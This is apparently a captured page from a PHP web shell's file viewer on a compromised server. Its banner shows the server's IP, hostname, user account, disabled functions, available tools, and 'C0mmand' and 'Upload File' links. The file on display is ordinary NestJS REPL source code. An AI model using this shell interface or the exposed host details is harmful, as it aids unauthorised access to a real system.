Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/@nestjs/core/repl/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.repl = void 0; const common_1 = require("@nestjs/common"); const cli_colors_util_1 = require("@nestjs/common/utils/cli-colors.util"); const nest_factory_1 = require("../nest-factory"); const assign_to_object_util_1 = require("./assign-to-object.util"); const constants_1 = require("./constants"); const repl_context_1 = require("./repl-context"); const repl_logger_1 = require("./repl-logger"); const repl_native_commands_1 = require("./repl-native-commands"); async function repl(module) { const app = await nest_factory_1.NestFactory.createApplicationContext(module, { abortOnError: false, logger: new repl_logger_1.ReplLogger(), }); await app.init(); const replContext = new repl_context_1.ReplContext(app); common_1.Logger.log(constants_1.REPL_INITIALIZED_MESSAGE); const _repl = await Promise.resolve().then(() => require('repl')); const replServer = _repl.start({ prompt: cli_colors_util_1.clc.green('> '), ignoreUndefined: true, }); (0, assign_to_object_util_1.assignToObject)(replServer.context, replContext.globalScope); (0, repl_native_commands_1.defineDefaultCommandsOnRepl)(replServer); return replServer; } exports.repl = repl;